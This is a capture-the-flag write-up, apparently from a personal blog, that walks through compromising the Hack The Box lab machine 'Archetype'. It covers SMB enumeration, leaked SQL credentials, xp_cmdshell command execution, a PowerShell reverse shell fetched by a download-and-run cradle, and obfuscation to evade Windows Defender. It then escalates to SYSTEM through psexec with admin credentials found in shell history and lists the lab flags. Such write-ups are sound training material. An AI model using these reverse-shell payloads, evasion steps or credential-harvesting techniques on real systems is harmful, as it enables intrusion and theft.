As today I had some time off, and I’ve only recently found https://app.hackthebox.eu, I’ve decided to spend some time on their “Starting Point” lab machine set and have some fun removing the rust from my memory.
The first machine we are doing a simple penetration test is called Archetype and apperentely it is a windows machine. Let us start by enumerating the services with nmap
:
$nmap -sV -sC 10.10.10.27 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 19:43 CEST
Nmap scan report for 10.10.10.27
Host is up (0.093s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-04-03T18:03:14
|_Not valid after: 2051-04-03T18:03:14
|_ssl-date: 2021-04-03T18:07:42+00:00; +21m24s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h45m24s, deviation: 3h07m50s, median: 21m23s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-03T11:07:33-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-03T18:07:36
|_ start_date: N/A
We can see that it is a windows machine with shared files via smb
, without providing any user nor login. Let us see what we can list:
$smbclient -N -L \\\\10.10.10.27
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
We can see that backups
is accessible to everyone . When trying to connect without password:
$smbclient \\\\10.10.10.27\\backups
Enter WORKGROUP\alacrau's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 13:20:57 2020
.. D 0 Mon Jan 20 13:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 13:23:02 2020
10328063 blocks of size 4096. 8208731 blocks available
smb: \>
smb: \> pwd
Current directory is \\10.10.10.27\backups\
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
Let us now investigate the content of this prod.dtsConfig
file:
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
We stumble on our first loot file, so looking through this configuration it looks like we are chasing a sql user, sql_svc
:
- username:
sql_svc
- password:
M3g4c0rp123
Let us try to login with these credentials, but first let us search for any help on metasploit to see if we can find anything interesting:
msf6 > search mssql
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/misc/ais_esel_server_rce 2019-03-27 excellent Yes AIS logistics ESEL-Server Unauth SQL Injection RCE
1 auxiliary/server/capture/mssql normal No Authentication Capture: MSSQL
(...)
31 auxiliary/admin/mssql/mssql_exec normal No Microsoft SQL Server xp_cmdshell Command Execution
So aux module 31 looks intersting (and quite notorious):
Description:
This module will execute a Windows command on a MSSQL/MSDE instance
via the xp_cmdshell procedure. A valid username and password is
required to use this module
References:
http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx
Let us use it (msf6 > use 31
) and setup the exploit parameters:
msf6 > set PASSWORD M3g4c0rp123
PASSWORD => M3g4c0rp123
msf6 > set USERNAME sql_svc
USERNAME => sql_svc
msf6 > set RHOSTS 10.10.10.27
RHOSTS => 10.10.10.27
msf6 > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true
msf6 > set DOMAIN ARCHETYPE
DOMAIN => ARCHETYPE
msf6 > use auxiliary/admin/mssql/mssql_exec
msf6 auxiliary(admin/mssql/mssql_exec) > show options
Module options (auxiliary/admin/mssql/mssql_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD cmd.exe /c echo OWNED no Command to execute
> C:\owned.exe
PASSWORD M3g4c0rp123 no The password for the specified user
name
RHOSTS 10.10.10.27 yes The target host(s), range CIDR iden
tifier, or hosts file with syntax '
file:<path>'
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Enc
ryption"
USERNAME sql_svc no The username to authenticate as
USE_WINDOWS_AUTHENT true yes Use windows authentification (requi
res DOMAIN option set)
msf6 auxiliary(admin/mssql/mssql_exec) > exploit
....
After running this command we easily check that the machine is exploitable, as we obtain an output from our command, so we can start our process of trying to obtain a shell access over there. Our reverse shell, that we will kindly name lol.ps1
, taken from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1, will contain a hit to our local netcat listener:
$sm=(New-Object Net.Sockets.TCPClient('10.10.14.167',4242)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Let us as well fire up our nc
listener on port 4242
so it can wait for connections from our reverse shell above:
$nc -lvnp 4242
listening on [any] 4242 ..
Well now start a webserver to serve our reverse shell script so we can download it from inside the machine:
python -m http.server
This will spawn a http server on our machine at port 8000
in order to serve our powershell reverse shell. Then we set the command on metasploit, and run the exploit:
set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'
We will then run this script and we can see that we obtain an Antivirus message for tryting to run our shell code:
msf6 auxiliary(admin/mssql/mssql_exec) > set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'
CMD => powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");
msf6 auxiliary(admin/mssql/mssql_exec) > exploit
[*] Running module against 10.10.10.27
[*] 10.10.10.27:1433 - SQL Query: EXEC master..xp_cmdshell 'powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'
output
------
IEX : At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient("10.10.14.167",4242 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.167:80 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.Inv
okeExpressionCommand
[*] Auxiliary module execution completed
In order to bypass this we will need to obfuscate our powershell code so that the Windows defender antivirus does not detect it. For this task we’ve used the ISESteroids
obtainable from http://www.powertheshell.com/isesteroids/. After running the “Obfuscate” tool on our script we obtain a new one:
${____/\/=\/==\__/\}=(New-Object Net.Sockets.TCPClient($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQAwAC4AMQAwAC4AMQA0AC4AMQA2ADcA'))),4242)).GetStream();[byte[]]${__/\_/=\_/\__/=\/}=0..65535|%{0};while((${___/\/=======\/\/}=${____/\/=\/==\__/\}.Read(${__/\_/=\_/\__/=\/},0,${__/\_/=\_/\__/=\/}.Length)) -ne 0){;${__/\/\/==\/=\/\_/}=(New-Object Text.ASCIIEncoding).GetString(${__/\_/=\_/\__/=\/},0,${___/\/=======\/\/});${_/==\___/=\/\__/=}=([text.encoding]::ASCII).GetBytes((iex ${__/\/\/==\/=\/\_/} 2>&1));${____/\/=\/==\__/\}.Write(${_/==\___/=\/\__/=},0,${_/==\___/=\/\__/=}.Length)}
So as we can see above, some of our var names were obfuscated and also our IP address was encoded with base64. When running now the exploit from metasploit we can see now a hit on our netcat session:
$nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.27] 49678
whoami
archetype\sql_svc
As we now have a shell we can start by going through the list of priviledge escalation, having a look into the check list in https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#system-info, and we have a hit when trying to check some command history:
pwd
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
dir
ConsoleHost_history.txt
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit
We can now use a tool to run a remote powershell session (https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/psexec.py) using our newly found credentials:
$python3 psexec.py administrator@10.10.10.27
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file PtMMrPNw.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service SGjW on 10.10.10.27.....
[*] Starting service SGjW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
As we now have an admin shell on this machine, we can then look around for the flags. We could found them on the “Desktop” folder of the admin:
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CE13-2325
Directory of C:\Users\Administrator\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 33,834,831,872 bytes free
C:\Users\Administrator\Desktop>type root.txt
b91ccec3305e98240082d4474b848528
C:\Users\Administrator\Desktop>
As we forgot previously, the user flag can be collected from the sql_svc
user desktop folder:
C:\Users\sql_svc\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CE13-2325
Directory of C:\Users\sql_svc\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:37 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 33,833,373,696 bytes free
C:\Users\sql_svc\Desktop>type user.txt
3e7b102e78218e935bf3f4951fec21a3
C:\Users\sql_svc\Desktop>
Our flags for this challenge are then:
- user:
3e7b102e78218e935bf3f4951fec21a3
- admin:
b91ccec3305e98240082d4474b848528
Easy but fun, this platform is quite cool so I guess I’ll keep exploring, so please ping me if you have any doubt.